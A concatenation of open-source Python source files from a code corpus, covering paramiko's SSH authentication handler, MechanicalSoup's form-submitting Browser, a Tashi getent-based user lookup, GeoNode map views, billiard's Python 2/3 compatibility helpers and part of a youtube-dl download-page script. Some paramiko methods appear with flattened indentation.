MSG_USERAUTH_REQUEST, MSG_USERAUTH_SUCCESS, MSG_USERAUTH_FAILURE, \
MSG_USERAUTH_BANNER, MSG_USERAUTH_INFO_REQUEST, MSG_USERAUTH_INFO_RESPONSE
from paramiko.message import Message
from paramiko.py3compat import bytestring
from paramiko.ssh_exception import SSHException, AuthenticationException, \
BadAuthenticationType, PartialAuthentication
from paramiko.server import InteractiveQuery
class AuthHandler (object):
"""
Internal class to handle the mechanics of authentication.
"""
    def __init__(self, transport):
        # A weak proxy avoids a reference cycle that would keep the
        # Transport alive.
        self.transport = weakref.proxy(transport)
        # Client-side state:
        self.username = None
        self.authenticated = False
        self.auth_event = None
        self.auth_method = ''
        self.banner = None
        self.password = None
        self.private_key = None
        self.interactive_handler = None
        self.submethods = None
        # for server mode:
        self.auth_username = None
        self.auth_fail_count = 0
    def is_authenticated(self):
        """Return True once authentication has completed successfully."""
        return self.authenticated
def get_username(self):
if self.transport.server_mode:
return self.auth_username
else:
return self.username
def auth_none(self, username, event):
self.transport.lock.acquire()
try:
self.auth_event = event
self.auth_method = 'none'
self.username = username
self._request_auth()
finally:
self.transport.lock.release()
def auth_publickey(self, username, key, event):
self.transport.lock.acquire()
try:
self.auth_event = event
self.auth_method = 'publickey'
self.username = username
self.private_key = key
self._request_auth()
finally:
self.transport.lock.release()
def auth_password(self, username, password, event):
self.transport.lock.acquire()
try:
self.auth_event = event
self.auth_method = 'password'
self.username = username
self.password = password
self._request_auth()
finally:
self.transport.lock.release()
def auth_interactive(self, username, handler, event, submethods=''):
"""
response_list = handler(title, instructions, prompt_list)
"""
self.transport.lock.acquire()
try:
self.auth_event = event
self.auth_method = 'keyboard-interactive'
self.username = username
self.interactive_handler = handler
self.submethods = submethods
self._request_auth()
finally:
self.transport.lock.release()
    def abort(self):
        """Wake any thread blocked in wait_for_response (e.g. on transport close)."""
        if self.auth_event is not None:
            self.auth_event.set()
### internals...
    def _request_auth(self):
        # Ask the server for the 'ssh-userauth' service; the actual auth
        # request is sent only after the service is accepted (see
        # _parse_service_accept).
        m = Message()
        m.add_byte(cMSG_SERVICE_REQUEST)
        m.add_string('ssh-userauth')
        self.transport._send_message(m)
    def _disconnect_service_not_available(self):
        # Send a DISCONNECT (service not available) and tear down the
        # transport.
        m = Message()
        m.add_byte(cMSG_DISCONNECT)
        m.add_int(DISCONNECT_SERVICE_NOT_AVAILABLE)
        m.add_string('Service not available')
        m.add_string('en')
        self.transport._send_message(m)
        self.transport.close()
    def _disconnect_no_more_auth(self):
        # Send a DISCONNECT (no more auth methods) and tear down the
        # transport; used after too many failed attempts.
        m = Message()
        m.add_byte(cMSG_DISCONNECT)
        m.add_int(DISCONNECT_NO_MORE_AUTH_METHODS_AVAILABLE)
        m.add_string('No more auth methods available')
        m.add_string('en')
        self.transport._send_message(m)
        self.transport.close()
    def _get_session_blob(self, key, service, username):
        """Serialize the data that is signed with the private key to prove
        ownership during public-key authentication: the session id followed
        by the fields of the userauth request."""
        m = Message()
        m.add_string(self.transport.session_id)
        m.add_byte(cMSG_USERAUTH_REQUEST)
        m.add_string(username)
        m.add_string(service)
        m.add_string('publickey')
        m.add_boolean(True)
        m.add_string(key.get_name())
        m.add_string(key)
        return m.asbytes()
    def wait_for_response(self, event):
        """Block until authentication finishes (or the transport dies).

        Returns a list of auth types still allowed after a partial success,
        or an empty list on full success.  Raises the transport's saved
        exception (or a generic AuthenticationException) on failure.
        """
        while True:
            # Poll so a dead transport is noticed even if the event is
            # never set.
            event.wait(0.1)
            if not self.transport.is_active():
                e = self.transport.get_exception()
                if (e is None) or issubclass(e.__class__, EOFError):
                    e = AuthenticationException('Authentication failed.')
                raise e
            if event.isSet():
                break
        if not self.is_authenticated():
            e = self.transport.get_exception()
            if e is None:
                e = AuthenticationException('Authentication failed.')
            # this is horrible.  Python Exception isn't yet descended from
            # object, so type(e) won't work. :(
            if issubclass(e.__class__, PartialAuthentication):
                # Partial success: report the remaining allowed auth types.
                return e.allowed_types
            raise e
        return []
    def _parse_service_request(self, m):
        """Server side: accept a client's 'ssh-userauth' service request."""
        service = m.get_text()
        if self.transport.server_mode and (service == 'ssh-userauth'):
            # accepted
            m = Message()
            m.add_byte(cMSG_SERVICE_ACCEPT)
            m.add_string(service)
            self.transport._send_message(m)
            return
        # dunno this one: any other service (or client mode) is refused.
        self._disconnect_service_not_available()
    def _parse_service_accept(self, m):
        """Client side: the server accepted 'ssh-userauth'; send the actual
        userauth request for whichever auth_method was selected."""
        service = m.get_text()
        if service == 'ssh-userauth':
            self.transport._log(DEBUG, 'userauth is OK')
            m = Message()
            m.add_byte(cMSG_USERAUTH_REQUEST)
            m.add_string(self.username)
            m.add_string('ssh-connection')
            m.add_string(self.auth_method)
            if self.auth_method == 'password':
                m.add_boolean(False)
                password = bytestring(self.password)
                m.add_string(password)
            elif self.auth_method == 'publickey':
                m.add_boolean(True)
                m.add_string(self.private_key.get_name())
                m.add_string(self.private_key)
                # Sign the session blob to prove possession of the key.
                blob = self._get_session_blob(self.private_key, 'ssh-connection', self.username)
                sig = self.private_key.sign_ssh_data(blob)
                m.add_string(sig)
            elif self.auth_method == 'keyboard-interactive':
                m.add_string('')
                m.add_string(self.submethods)
            elif self.auth_method == 'none':
                pass
            else:
                raise SSHException('Unknown auth method "%s"' % self.auth_method)
            self.transport._send_message(m)
        else:
            self.transport._log(DEBUG, 'Service request "%s" accepted (?)' % service)
def _send_auth_result(self, username, method, result):
    """Send USERAUTH_SUCCESS or USERAUTH_FAILURE for a finished attempt.

    On failure the reply carries the server's remaining allowed auth
    types plus a partial-success flag; after 10 failures the connection
    is torn down.
    """
    # okay, send result
    m = Message()
    if result == AUTH_SUCCESSFUL:
        self.transport._log(INFO, 'Auth granted (%s).' % method)
        m.add_byte(cMSG_USERAUTH_SUCCESS)
        self.authenticated = True
    else:
        self.transport._log(INFO, 'Auth rejected (%s).' % method)
        m.add_byte(cMSG_USERAUTH_FAILURE)
        m.add_string(self.transport.server_object.get_allowed_auths(username))
        if result == AUTH_PARTIALLY_SUCCESSFUL:
            m.add_boolean(True)
        else:
            m.add_boolean(False)
        self.auth_fail_count += 1
    self.transport._send_message(m)
    if self.auth_fail_count >= 10:
        self._disconnect_no_more_auth()
    if result == AUTH_SUCCESSFUL:
        self.transport._auth_trigger()
def _interactive_query(self, q):
    """Send a USERAUTH_INFO_REQUEST built from the InteractiveQuery *q*."""
    msg = Message()
    msg.add_byte(cMSG_USERAUTH_INFO_REQUEST)
    msg.add_string(q.name)
    msg.add_string(q.instructions)
    msg.add_string(bytes())          # language tag (left empty)
    msg.add_int(len(q.prompts))
    for prompt in q.prompts:
        # each prompt pairs the prompt text with a boolean flag
        msg.add_string(prompt[0])
        msg.add_boolean(prompt[1])
    self.transport._send_message(msg)
def _parse_userauth_request(self, m):
    """Server-side dispatch for an incoming USERAUTH_REQUEST packet.

    Parses the (username, service, method) triple, validates credentials
    through the transport's server_object callbacks, and replies with an
    auth result -- or an interactive query for keyboard-interactive.
    Message fields are consumed in wire order; do not reorder the get_*
    calls.
    """
    if not self.transport.server_mode:
        # er, uh... what?  We are a client; refuse with an empty
        # allowed-methods list.
        m = Message()
        m.add_byte(cMSG_USERAUTH_FAILURE)
        m.add_string('none')
        m.add_boolean(False)
        self.transport._send_message(m)
        return
    if self.authenticated:
        # ignore
        return
    username = m.get_text()
    service = m.get_text()
    method = m.get_text()
    self.transport._log(DEBUG, 'Auth request (type=%s) service=%s, username=%s' % (method, service, username))
    if service != 'ssh-connection':
        self._disconnect_service_not_available()
        return
    if (self.auth_username is not None) and (self.auth_username != username):
        self.transport._log(WARNING, 'Auth rejected because the client attempted to change username in mid-flight')
        self._disconnect_no_more_auth()
        return
    self.auth_username = username

    if method == 'none':
        result = self.transport.server_object.check_auth_none(username)
    elif method == 'password':
        changereq = m.get_boolean()
        password = m.get_binary()
        try:
            password = password.decode('UTF-8')
        except UnicodeError:
            # some clients/servers expect non-utf-8 passwords!
            # in this case, just return the raw byte string.
            pass
        if changereq:
            # always treated as failure, since we don't support changing passwords, but collect
            # the list of valid auth types from the callback anyway
            self.transport._log(DEBUG, 'Auth request to change passwords (rejected)')
            newpassword = m.get_binary()
            try:
                newpassword = newpassword.decode('UTF-8', 'replace')
            except UnicodeError:
                pass
            result = AUTH_FAILED
        else:
            result = self.transport.server_object.check_auth_password(username, password)
    elif method == 'publickey':
        sig_attached = m.get_boolean()
        keytype = m.get_text()
        keyblob = m.get_binary()
        try:
            # reconstruct the client's key object from its wire blob
            key = self.transport._key_info[keytype](Message(keyblob))
        except SSHException as e:
            self.transport._log(INFO, 'Auth rejected: public key: %s' % str(e))
            key = None
        except:
            self.transport._log(INFO, 'Auth rejected: unsupported or mangled public key')
            key = None
        if key is None:
            self._disconnect_no_more_auth()
            return
        # first check if this key is okay... if not, we can skip the verify
        result = self.transport.server_object.check_auth_publickey(username, key)
        if result != AUTH_FAILED:
            # key is okay, verify it
            if not sig_attached:
                # client wants to know if this key is acceptable, before it
                # signs anything... send special "ok" message
                m = Message()
                m.add_byte(cMSG_USERAUTH_PK_OK)
                m.add_string(keytype)
                m.add_string(keyblob)
                self.transport._send_message(m)
                return
            sig = Message(m.get_binary())
            blob = self._get_session_blob(key, service, username)
            if not key.verify_ssh_sig(blob, sig):
                self.transport._log(INFO, 'Auth rejected: invalid signature')
                result = AUTH_FAILED
    elif method == 'keyboard-interactive':
        lang = m.get_string()
        submethods = m.get_string()
        result = self.transport.server_object.check_auth_interactive(username, submethods)
        if isinstance(result, InteractiveQuery):
            # make interactive query instead of response
            self._interactive_query(result)
            return
    else:
        result = self.transport.server_object.check_auth_none(username)
    # okay, send result
    self._send_auth_result(username, method, result)
def _parse_userauth_success(self, m):
    """Client-side: the server granted authentication.

    Flags success and wakes anyone blocked in wait_for_response().
    """
    self.transport._log(INFO, 'Authentication (%s) successful!' % self.auth_method)
    self.authenticated = True
    self.transport._auth_trigger()
    if self.auth_event is not None:
        self.auth_event.set()
def _parse_userauth_failure(self, m):
    """Handle USERAUTH_FAILURE: record why, reset auth state, wake waiters."""
    allowed = m.get_list()
    partial_success = m.get_boolean()
    if partial_success:
        # This method succeeded, but the server requires further auth.
        self.transport._log(INFO, 'Authentication continues...')
        self.transport._log(DEBUG, 'Methods: ' + str(allowed))
        self.transport.saved_exception = PartialAuthentication(allowed)
    elif self.auth_method not in allowed:
        # The method we tried is not even in the server's allowed set.
        self.transport._log(DEBUG, 'Authentication type (%s) not permitted.' % self.auth_method)
        self.transport._log(DEBUG, 'Allowed methods: ' + str(allowed))
        self.transport.saved_exception = BadAuthenticationType('Bad authentication type', allowed)
    else:
        self.transport._log(INFO, 'Authentication (%s) failed.' % self.auth_method)
    self.authenticated = False
    self.username = None
    if self.auth_event is not None:
        self.auth_event.set()
def _parse_userauth_banner(self, m):
    """Store and log the server's pre-auth banner; the trailing language
    tag is read off the wire but otherwise ignored."""
    banner = m.get_string()
    self.banner = banner
    lang = m.get_string()
    self.transport._log(INFO, 'Auth banner: %s' % banner)
    # who cares.
def _parse_userauth_info_request(self, m):
    """Client-side: answer one keyboard-interactive prompt round.

    Decodes the server's prompts, hands them to interactive_handler,
    and sends the answers back as a USERAUTH_INFO_RESPONSE.
    """
    if self.auth_method != 'keyboard-interactive':
        raise SSHException('Illegal info request from server')
    title = m.get_text()
    instructions = m.get_text()
    m.get_binary()  # lang
    prompts = m.get_int()
    prompt_list = []
    for i in range(prompts):
        # each prompt is (text, boolean flag) as sent by the server
        prompt_list.append((m.get_text(), m.get_boolean()))
    response_list = self.interactive_handler(title, instructions, prompt_list)
    m = Message()
    m.add_byte(cMSG_USERAUTH_INFO_RESPONSE)
    m.add_int(len(response_list))
    for r in response_list:
        m.add_string(r)
    self.transport._send_message(m)
def _parse_userauth_info_response(self, m):
    """Server-side: handle a client's USERAUTH_INFO_RESPONSE
    (keyboard-interactive).

    Collects the client's answers, passes them to the server object, and
    either issues another interactive round or sends the final result.
    """
    if not self.transport.server_mode:
        raise SSHException('Illegal info response from server')
    n = m.get_int()
    responses = []
    for i in range(n):
        responses.append(m.get_text())
    result = self.transport.server_object.check_auth_interactive_response(responses)
    # Bug fix: this previously tested isinstance(type(result), InteractiveQuery),
    # which is always False (type(result) is a class object, never an
    # InteractiveQuery instance), so follow-up interactive rounds were never
    # issued.  Test the result itself, exactly as _parse_userauth_request does.
    if isinstance(result, InteractiveQuery):
        # make interactive query instead of response
        self._interactive_query(result)
        return
    self._send_auth_result(self.auth_username, 'keyboard-interactive', result)
# Dispatch table mapping SSH message-type codes to the unbound handler
# methods above; presumably the transport's packet loop routes incoming
# auth packets through it -- confirm against Transport.
_handler_table = {
    MSG_SERVICE_REQUEST: _parse_service_request,
    MSG_SERVICE_ACCEPT: _parse_service_accept,
    MSG_USERAUTH_REQUEST: _parse_userauth_request,
    MSG_USERAUTH_SUCCESS: _parse_userauth_success,
    MSG_USERAUTH_FAILURE: _parse_userauth_failure,
    MSG_USERAUTH_BANNER: _parse_userauth_banner,
    MSG_USERAUTH_INFO_REQUEST: _parse_userauth_info_request,
    MSG_USERAUTH_INFO_RESPONSE: _parse_userauth_info_response,
}
| gpl-3.0 |
tedlaz/pyted | sms/mechanicalsoup/browser.py | 1 | 4666 | import warnings
import requests
import bs4
from six.moves import urllib
from six import string_types
from .form import Form
import webbrowser
import tempfile
# see
# https://www.crummy.com/software/BeautifulSoup/bs4/doc/#specifying-the-parser-to-use
# Silence bs4's "no parser specified" warning module-wide; callers can pick
# a parser explicitly via Browser's soup_config.
warnings.filterwarnings(
    "ignore", "No parser was explicitly specified", module="bs4")
class Browser(object):
    """Stateful programmatic web client built on requests + BeautifulSoup.

    Wraps a requests.Session and attaches a parsed ``.soup`` attribute to
    every response whose Content-Type is HTML.
    """

    def __init__(self, session=None, soup_config=None, requests_adapters=None):
        """Create a browser.

        :param session: an existing requests.Session to reuse; a fresh one
            is created when omitted.
        :param soup_config: dict of kwargs forwarded to bs4.BeautifulSoup.
        :param requests_adapters: optional {url-prefix: adapter} mapping
            mounted onto the session.
        """
        self.session = session or requests.Session()

        if requests_adapters is not None:
            for adaptee, adapter in requests_adapters.items():
                self.session.mount(adaptee, adapter)

        self.soup_config = soup_config or dict()

    @staticmethod
    def add_soup(response, soup_config):
        """Attach a BeautifulSoup of the body as ``response.soup`` (HTML only)."""
        if "text/html" in response.headers.get("Content-Type", ""):
            response.soup = bs4.BeautifulSoup(
                response.content, **soup_config)

    def request(self, *args, **kwargs):
        """Proxy for Session.request that also attaches ``.soup``."""
        response = self.session.request(*args, **kwargs)
        Browser.add_soup(response, self.soup_config)
        return response

    def get(self, *args, **kwargs):
        """Proxy for Session.get that also attaches ``.soup``."""
        response = self.session.get(*args, **kwargs)
        Browser.add_soup(response, self.soup_config)
        return response

    def post(self, *args, **kwargs):
        """Proxy for Session.post that also attaches ``.soup``."""
        response = self.session.post(*args, **kwargs)
        Browser.add_soup(response, self.soup_config)
        return response

    def _build_request(self, form, url=None, **kwargs):
        """Translate a bs4 ``<form>`` element into a requests.Request,
        approximating browser form-submission rules for inputs,
        textareas and selects."""
        method = str(form.get("method", "get"))
        action = form.get("action")
        url = urllib.parse.urljoin(url, action)
        if url is None:  # This happens when both `action` and `url` are None.
            raise ValueError('no URL to submit to')

        # read http://www.w3.org/TR/html5/forms.html
        data = kwargs.pop("data", dict())
        files = kwargs.pop("files", dict())
        for input in form.select("input"):
            name = input.get("name")
            if not name:
                continue

            if input.get("type") in ("radio", "checkbox"):
                # unchecked radio/checkbox inputs submit nothing
                if "checked" not in input.attrs:
                    continue
                value = input.get("value", "on")
            else:
                # web browsers use empty string for inputs with missing values
                value = input.get("value", "")

            if input.get("type") == "checkbox":
                # checkboxes may repeat a name; collect values in a list
                data.setdefault(name, []).append(value)
            elif input.get("type") == "file":
                # read http://www.cs.tut.fi/~jkorpela/forms/file.html
                # in web browsers, file upload only happens if the form"s (or
                # submit button"s) enctype attribute is set to
                # "multipart/form-data". we don"t care, simplify.
                if not value:
                    continue
                if isinstance(value, string_types):
                    # NOTE(review): this handle is never explicitly closed;
                    # it lives until garbage collection.
                    value = open(value, "rb")
                files[name] = value
            else:
                data[name] = value

        for textarea in form.select("textarea"):
            name = textarea.get("name")
            if not name:
                continue
            data[name] = textarea.text

        for select in form.select("select"):
            name = select.get("name")
            if not name:
                continue
            multiple = "multiple" in select.attrs
            values = []
            for i, option in enumerate(select.select("option")):
                # first option is the implicit default for single selects
                if (i == 0 and not multiple) or "selected" in option.attrs:
                    values.append(option.get("value", ""))
            if multiple:
                data[name] = values
            elif values:
                # single select: the last candidate value wins
                data[name] = values[-1]

        if method.lower() == "get":
            kwargs["params"] = data
        else:
            kwargs["data"] = data
        return requests.Request(method, url, files=files, **kwargs)

    def _prepare_request(self, form, url=None, **kwargs):
        """Build and session-prepare the request for *form*."""
        request = self._build_request(form, url, **kwargs)
        return self.session.prepare_request(request)

    def submit(self, form, url=None, **kwargs):
        """Submit *form* (bs4 element or mechanicalsoup Form) and return
        the response with ``.soup`` attached."""
        if isinstance(form, Form):
            form = form.form
        request = self._prepare_request(form, url, **kwargs)
        response = self.session.send(request)
        Browser.add_soup(response, self.soup_config)
        return response

    def launch_browser(self, soup):
        """Launch a browser on the page, for debugging purpose."""
        with tempfile.NamedTemporaryFile(delete=False) as file:
            file.write(soup.encode())
        webbrowser.open('file://' + file.name)
| gpl-3.0 |
stroucki/tashi | src/tashi/clustermanager/data/getentoverride.py | 2 | 4973 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import logging
import subprocess
import time
import os
from tashi.rpycservices.rpyctypes import User, LocalImages, Instance, Host
from tashi.clustermanager.data import DataInterface
from tashi.util import instantiateImplementation, humanReadable
class GetentOverride(DataInterface):
    """DataInterface decorator that delegates all storage operations to a
    wrapped backend, except user lookups, which are satisfied from
    getent(1) output (or a cached getent file) and refreshed at most
    once per ``fetchThreshold`` seconds.
    """

    def __init__(self, config):
        DataInterface.__init__(self, config)
        self.log = logging.getLogger(__name__)
        self.baseDataObject = instantiateImplementation(config.get("GetentOverride", "baseData"), config)
        self.dfs = instantiateImplementation(config.get("ClusterManager", "dfs"), config)
        # NOTE(review): config.get returns a string, so any non-empty value
        # (even "False") is truthy below -- confirm intended semantics.
        self.useLocal = config.get("GetentOverride", "getentFromLocalFile")
        self.localFileName = config.get("GetentOverride", "getentLocalFile")
        self.users = {}
        self.lastUserUpdate = 0.0
        self.fetchThreshold = float(config.get("GetentOverride", "fetchThreshold"))

    def _checkType(self, obj, expectedType):
        # Shared argument check (replaces five identical inline copies):
        # log and raise TypeError when obj is not exactly expectedType.
        # Message text matches the previous per-method checks.
        if type(obj) is not expectedType:
            self.log.exception("Argument is not of type %s, but of type %s" % (expectedType.__name__, type(obj)))
            raise TypeError

    def registerInstance(self, instance):
        self._checkType(instance, Instance)
        return self.baseDataObject.registerInstance(instance)

    def acquireInstance(self, instanceId):
        return self.baseDataObject.acquireInstance(instanceId)

    def releaseInstance(self, instance):
        self._checkType(instance, Instance)
        return self.baseDataObject.releaseInstance(instance)

    def removeInstance(self, instance):
        self._checkType(instance, Instance)
        return self.baseDataObject.removeInstance(instance)

    def acquireHost(self, hostId):
        self._checkType(hostId, int)
        return self.baseDataObject.acquireHost(hostId)

    def releaseHost(self, host):
        self._checkType(host, Host)
        return self.baseDataObject.releaseHost(host)

    def getHosts(self):
        return self.baseDataObject.getHosts()

    def getHost(self, _id):
        return self.baseDataObject.getHost(_id)

    def getInstances(self):
        return self.baseDataObject.getInstances()

    def getInstance(self, _id):
        return self.baseDataObject.getInstance(_id)

    def getNetworks(self):
        return self.baseDataObject.getNetworks()

    def getNetwork(self, _id):
        return self.baseDataObject.getNetwork(_id)

    def getImages(self):
        """List files in the DFS 'images' directory as LocalImages records
        with sequential ids and human-readable sizes."""
        count = 0
        myList = []
        for i in self.dfs.list("images"):
            myFile = self.dfs.getLocalHandle("images/" + i)
            if os.path.isfile(myFile):
                image = LocalImages(d={'id': count, 'imageName': i, 'imageSize': humanReadable(self.dfs.stat(myFile)[6])})
                myList.append(image)
                count += 1
        return myList

    def fetchFromGetent(self):
        """Refresh the user cache from getent output, rate-limited to once
        per fetchThreshold seconds."""
        now = time.time()
        if (now - self.lastUserUpdate > self.fetchThreshold):
            myUsers = {}
            # Use local getent file instead of querying the administrative db
            if self.useLocal:
                if os.path.exists(self.localFileName):
                    cmd = "cat %s" % self.localFileName
                    p = subprocess.Popen(cmd.split(), stdout=subprocess.PIPE)
                else:
                    self.log.warning("getent cache file not found (%s)" % (self.localFileName))
                    p = subprocess.Popen("getent passwd".split(), stdout=subprocess.PIPE)
            # Query administrative database
            else:
                p = subprocess.Popen("getent passwd".split(), stdout=subprocess.PIPE)
            try:
                for l in p.stdout.xreadlines():
                    # passwd line: name:passwd:uid:...
                    ws = l.strip().split(":")
                    _id = int(ws[2])
                    name = ws[0]
                    user = User()
                    user.id = _id
                    user.name = name
                    myUsers[_id] = user
                # publish the new cache only after a full successful parse
                self.users = myUsers
                self.lastUserUpdate = now
            finally:
                p.wait()

    def getUsers(self):
        self.fetchFromGetent()
        return self.users

    def getUser(self, _id):
        self.fetchFromGetent()
        return self.users[_id]

    def registerHost(self, hostname, memory, cores, version):
        return self.baseDataObject.registerHost(hostname, memory, cores, version)

    def unregisterHost(self, hostId):
        return self.baseDataObject.unregisterHost(hostId)
| apache-2.0 |
gdreich/geonode | geonode/maps/qgis_server_views.py | 16 | 2139 | # -*- coding: utf-8 -*-
#########################################################################
#
# Copyright (C) 2016 OSGeo
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
#########################################################################
from django.views.generic import CreateView, DetailView
from geonode.maps.models import Map, MapLayer
from geonode.layers.models import Layer
class MapCreateView(CreateView):
    """Map creation page rendered with the Leaflet map template.

    NOTE(review): get_context_data ignores kwargs and does not call
    super(), so the default CreateView context (form, view, ...) is
    discarded -- confirm this is intended.
    """
    model = Map
    fields = '__all__'
    template_name = 'leaflet_maps/map_view.html'
    context_object_name = 'map'

    def get_context_data(self, **kwargs):
        """Build a minimal template context: creation flag + all layers."""
        # list all required layers
        layers = Layer.objects.all()
        context = {
            'create': True,
            'layers': layers
        }
        return context

    def get_success_url(self):
        # NOTE(review): returns None; Django raises ImproperlyConfigured on
        # a successful form submission unless redirection happens elsewhere.
        pass

    def get_form_kwargs(self):
        """Pass-through of the default form kwargs (no customization yet)."""
        kwargs = super(MapCreateView, self).get_form_kwargs()
        return kwargs
class MapDetailView(DetailView):
    """Read-only map view page rendered with the Leaflet map template."""
    model = Map
    template_name = 'leaflet_maps/map_view.html'
    context_object_name = 'map'

    def get_context_data(self, **kwargs):
        """Build the template context: the map, its ordered layers, and the
        full layer list.

        NOTE(review): kwargs/super() are ignored, so default DetailView
        context entries are discarded -- confirm intended.
        """
        # list all required layers
        layers = Layer.objects.all()
        context = {
            'create': False,
            'layers': layers,
            'map': Map.objects.get(id=self.kwargs.get("mapid")),
            'map_layers': MapLayer.objects.filter(map_id=self.kwargs.get("mapid")).order_by('stack_order')
        }
        return context

    def get_object(self):
        """Look the map up by the 'mapid' URL kwarg instead of the default pk."""
        return Map.objects.get(id=self.kwargs.get("mapid"))
andresriancho/billiard | billiard/five.py | 8 | 5346 | # -*- coding: utf-8 -*-
"""
celery.five
~~~~~~~~~~~
Compatibility implementations of features
only available in newer Python versions.
"""
from __future__ import absolute_import
# ############# py3k #########################################################
import sys
PY3 = sys.version_info[0] == 3
try:
reload = reload # noqa
except NameError: # pragma: no cover
from imp import reload # noqa
try:
from UserList import UserList # noqa
except ImportError: # pragma: no cover
from collections import UserList # noqa
try:
from UserDict import UserDict # noqa
except ImportError: # pragma: no cover
from collections import UserDict # noqa
# ############# time.monotonic ###############################################

if sys.version_info < (3, 3):
    # Python < 3.3 lacks time.monotonic; emulate it per platform via ctypes.
    import platform
    SYSTEM = platform.system()

    if SYSTEM == 'Darwin':
        # macOS: mach_absolute_time() ticks converted to nanoseconds.
        import ctypes
        from ctypes.util import find_library
        libSystem = ctypes.CDLL('libSystem.dylib')
        CoreServices = ctypes.CDLL(find_library('CoreServices'),
                                   use_errno=True)
        mach_absolute_time = libSystem.mach_absolute_time
        mach_absolute_time.restype = ctypes.c_uint64
        absolute_to_nanoseconds = CoreServices.AbsoluteToNanoseconds
        absolute_to_nanoseconds.restype = ctypes.c_uint64
        absolute_to_nanoseconds.argtypes = [ctypes.c_uint64]

        def _monotonic():
            # seconds as float
            return absolute_to_nanoseconds(mach_absolute_time()) * 1e-9

    elif SYSTEM == 'Linux':
        # from stackoverflow:
        # questions/1205722/how-do-i-get-monotonic-time-durations-in-python
        import ctypes
        import os

        CLOCK_MONOTONIC = 1  # see <linux/time.h>

        class timespec(ctypes.Structure):
            _fields_ = [
                ('tv_sec', ctypes.c_long),
                ('tv_nsec', ctypes.c_long),
            ]

        librt = ctypes.CDLL('librt.so.1', use_errno=True)
        clock_gettime = librt.clock_gettime
        clock_gettime.argtypes = [
            ctypes.c_int, ctypes.POINTER(timespec),
        ]

        def _monotonic():  # noqa
            t = timespec()
            if clock_gettime(CLOCK_MONOTONIC, ctypes.pointer(t)) != 0:
                errno_ = ctypes.get_errno()
                raise OSError(errno_, os.strerror(errno_))
            return t.tv_sec + t.tv_nsec * 1e-9
    else:
        # Unknown platform: fall back to wall-clock time (NOT monotonic).
        from time import time as _monotonic
try:
    from time import monotonic
except ImportError:
    monotonic = _monotonic  # noqa
if PY3:
    # Python 3: native names, re-exported under version-neutral aliases.
    import builtins
    from queue import Queue, Empty, Full
    from itertools import zip_longest
    from io import StringIO, BytesIO

    map = map
    string = str
    string_t = str
    long_t = int
    text_t = str
    range = range
    int_types = (int, )

    open_fqdn = 'builtins.open'

    def items(d):
        # version-neutral dict item iteration
        return d.items()

    def keys(d):
        return d.keys()

    def values(d):
        return d.values()

    def nextfun(it):
        # callable that advances the iterator when invoked
        return it.__next__

    exec_ = getattr(builtins, 'exec')

    def reraise(tp, value, tb=None):
        """Re-raise *value* with traceback *tb* (Py3 syntax)."""
        if value.__traceback__ is not tb:
            raise value.with_traceback(tb)
        raise value

    class WhateverIO(StringIO):
        # StringIO intended to also accept bytes writes.
        def write(self, data):
            if isinstance(data, bytes):
                # NOTE(review): bytes has no .encode() on Py3, so this line
                # raises AttributeError for bytes input -- likely meant
                # .decode(); confirm upstream fix.
                data = data.encode()
            StringIO.write(self, data)

else:
    # Python 2: pull in the old module locations / builtin names.
    import __builtin__ as builtins  # noqa
    from Queue import Queue, Empty, Full  # noqa
    from itertools import imap as map, izip_longest as zip_longest  # noqa
    from StringIO import StringIO  # noqa

    string = unicode  # noqa
    string_t = basestring  # noqa
    text_t = unicode
    long_t = long  # noqa
    range = xrange
    int_types = (int, long)

    open_fqdn = '__builtin__.open'

    def items(d):  # noqa
        return d.iteritems()

    def keys(d):  # noqa
        return d.iterkeys()

    def values(d):  # noqa
        return d.itervalues()

    def nextfun(it):  # noqa
        return it.next

    def exec_(code, globs=None, locs=None):
        """Execute code in a namespace."""
        if globs is None:
            # default to the caller's globals/locals
            frame = sys._getframe(1)
            globs = frame.f_globals
            if locs is None:
                locs = frame.f_locals
            del frame
        elif locs is None:
            locs = globs
        exec("""exec code in globs, locs""")

    # Py2 three-argument raise is a syntax error under Py3, so define it
    # via exec_ to keep this module importable on both.
    exec_("""def reraise(tp, value, tb=None): raise tp, value, tb""")

    BytesIO = WhateverIO = StringIO  # noqa
def with_metaclass(Type, skip_attrs=set(['__dict__', '__weakref__'])):
    """Class decorator to set metaclass.

    Works with both Python 2 and Python 3 and it does not add
    an extra class in the lookup order like ``six.with_metaclass`` does
    (that is -- it copies the original class instead of using inheritance).
    """

    def _clone_with_metaclass(Class):
        # Rebuild the class under the requested metaclass, copying every
        # attribute except the per-instance machinery listed in skip_attrs.
        attrs = {}
        for key, value in items(vars(Class)):
            if key not in skip_attrs:
                attrs[key] = value
        return Type(Class.__name__, Class.__bases__, attrs)

    return _clone_with_metaclass
| bsd-3-clause |
jbuchbinder/youtube-dl | devscripts/gh-pages/generate-download.py | 28 | 1069 | #!/usr/bin/env python3
from __future__ import unicode_literals

import hashlib
import urllib.request
import json

# Resolve the latest release and download its main binary to checksum it.
versions_info = json.load(open('update/versions.json'))
version = versions_info['latest']
version_files = versions_info['versions'][version]
URL = version_files['bin'][0]
data = urllib.request.urlopen(URL).read()

# Read template page
with open('download.html.in', 'r', encoding='utf-8') as tmplf:
    template = tmplf.read()

# Placeholder -> value for every distributed artifact.
substitutions = {
    '@PROGRAM_VERSION@': version,
    '@PROGRAM_URL@': URL,
    '@PROGRAM_SHA256SUM@': hashlib.sha256(data).hexdigest(),
    '@EXE_URL@': version_files['exe'][0],
    '@EXE_SHA256SUM@': version_files['exe'][1],
    '@TAR_URL@': version_files['tar'][0],
    '@TAR_SHA256SUM@': version_files['tar'][1],
}
